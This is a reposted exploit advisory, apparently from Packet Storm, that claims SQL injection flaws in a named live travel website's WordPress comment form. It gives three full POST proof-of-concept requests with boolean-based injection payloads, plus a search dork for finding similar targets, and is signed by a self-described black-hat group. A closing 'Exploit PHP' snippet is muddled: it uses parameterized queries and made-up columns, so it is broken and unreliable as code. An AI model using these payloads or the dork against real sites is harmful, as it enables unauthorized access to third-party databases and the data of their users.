Security
Headlines
HeadlinesLatestCVEs

Headline

Flightio.com SQL Injection

Flightio.com suffers from a remote SQL injection vulnerability. The researchers reporting this claimed the site has not responded to their reports so we are posting this to add visibility to the issue.

Packet Storm
#sql#vulnerability#web#js#php#auth
This site which has a security problem with the SQL INJECTION Vulnerability "CWE-89".We have repeatedly reported to this site that it has a security problem and has ignored our report.We want to record this security issue ##########################################################################################################################                                                                                                                       ##   Exploit Title : Site Flight agency airpol the Islamic Republic of Iran  SQL INJECTION Vulnerability                                                                  ##                                                                                                                       ## Author        : E1.Coders                                                                                             ##                                                                                                                       ## Contact       : E1.Coders [at] Mail [dot] RU                                                                          ##                                                                                                                       ## Portal Link   :   https://flightio.com/                                                                                    ##                                                                                                                       ## Security Risk :   Medium                                                                                                ##                                                                                                                       ## Description   : All target's IRanian AIRPOT websites                                                               ##                                                                                                                       ##  DorK         : "inurl:wp-comments-post.php%5Eauthor="                                                               ##                                                                                                                       ###########################################################################################################################                                                                                                                       ##   Expl0iTs:                                                                                                              ### vuln type  : SQLInjection#  # refer address :   https://flightio.com/blog/attractions/best-chahbahar-attractions/# # request type : POST# # action url :   https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال   دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0# # parameter : comment_parent# # description : POST SQL INJECTION BooleanBased String# # POC :   https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال/**/دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0%27/**/aNd/**/7462200=7462200/**/aNd/**/%276199%27=%276199---------------------------------------##   Expl0iTs:            # vuln type  : SQLInjection#  # refer address :   https://flightio.com/blog/travel-tips/norouz-holiday-trips-in-iran/# # request type : POST# # action url :   https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال   دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319# # parameter : ak_hp_textarea# # description : POST SQL INJECTION BooleanBased String# # POC :   https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال/**/دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319%27)/**/aNd/**/4442431=4442431/**/aNd/**/(%276199%27)=(%276199------------------------------------------------# #   Expl0iTs:            # vuln type  : SQLInjection#  # refer address :   https://flightio.com/blog/travel-tips/hormuz-island-travel-guide/# # request type : POST# # action url :   https://flightio.com/blog/wp-comments-post.php^submit=ارسال   دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999# # parameter : author# # description : POST SQL INJECTION BooleanBased String# # POC :   https://flightio.com/blog/wp-comments-post.php^submit=ارسال/**/دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999%27)/**/oR/**/6197419=6197419/**/aNd/**/(%276199%27)=(%276199                                                               ###########################################################################################################################                                                                                                                       ##                                        | Security Is JOCK  |                                                          ##                                                                                                                       ##                                        | Russian Black Hat |                                                          ##                                                                                                                       ##########################################################################################################################  Exploit PHP : global $wpdb; $author = '99999999';$comment = 'WCRTEXTAREATESTINPUT9752286';$ak_hp_textarea = 'WCRTEXTAREATESTINPUT5571116'; $wpdb->prepare(    "INSERT INTO wp_comments (comment_post_ID, comment_author, comment_content, comment_parent, akismet_comment_nonce, ak_js, author) VALUES (%d, %s, %s, %d, %s, %d, %d)",    $comment_post_ID, $comment_author, $comment_content, $comment_parent, $akismet_comment_nonce, $ak_js, $author); $wpdb->insert('wp_comments', array(    'comment_post_ID' => $comment_post_ID,    'comment_author' => $comment_author,    'comment_content' => $comment_content,    'comment_parent' => $comment_parent,    'akismet_comment_nonce' => $akismet_comment_nonce,    'ak_js' => $ak_js,    'author' => $author));

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution